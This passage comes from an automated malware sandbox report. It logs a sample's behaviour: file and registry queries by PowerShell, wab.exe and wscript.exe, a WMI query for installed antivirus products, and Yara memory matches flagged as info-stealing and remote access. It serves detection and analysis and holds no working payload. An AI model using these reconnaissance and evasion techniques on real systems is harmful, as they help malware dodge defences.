Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match	File source: 0000000B.00000002.2686700696.00000000226D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 6052, type: MEMORYSTR

Remote Access Functionality

Source: Yara match	File source: 0000000B.00000002.2686700696.00000000226D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 6052, type: MEMORYSTR